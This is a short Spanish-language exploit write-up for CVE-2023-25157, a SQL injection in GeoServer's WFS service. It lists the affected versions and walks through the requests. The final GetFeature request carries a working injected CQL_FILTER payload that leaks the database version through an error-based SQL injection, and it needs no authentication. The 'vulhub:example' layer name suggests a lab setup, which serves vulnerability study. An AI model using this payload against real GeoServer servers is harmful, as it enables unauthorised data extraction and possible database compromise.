
Exploit para CVE-2023-25157: inyección SQL en el servicio WFS de GeoServer mediante sintaxis de filtro CQL manipulada, que permite la extracción remota de datos sin autenticación y un posible compromiso del servidor de base de datos.
Debido a que no se filtran las entradas del usuario, un atacante remoto no autenticado puede construir una sintaxis de filtro malformada, eludir el análisis léxico de GeoServer, provocar una inyección SQL, obtener información sensible del servidor, e incluso obtener permisos del servidor de base de datos.
GeoServer 2.20.x < 2.20.7
GeoServer 2.19.x < 2.19.7
GeoServer 2.18.x < 2.18.7
GeoServer 2.21.x < 2.21.4
GeoServer 2.22.x < 2.22.2
Buscar
/geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities

Obtener atributos relacionados del nombre de función
vulhub:example /geoserver/wfs?request=DescribeFeatureType&version=2.0.0&service=WFS&outputFormat=application/json&typeName=vulhub:example

/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=vulhub:example&CQL_FILTER=strStartsWith(name,'x'')+=+true+and+1=(SELECT+CAST+((SELECT+version())+AS+INTEGER))+--+')+=+true



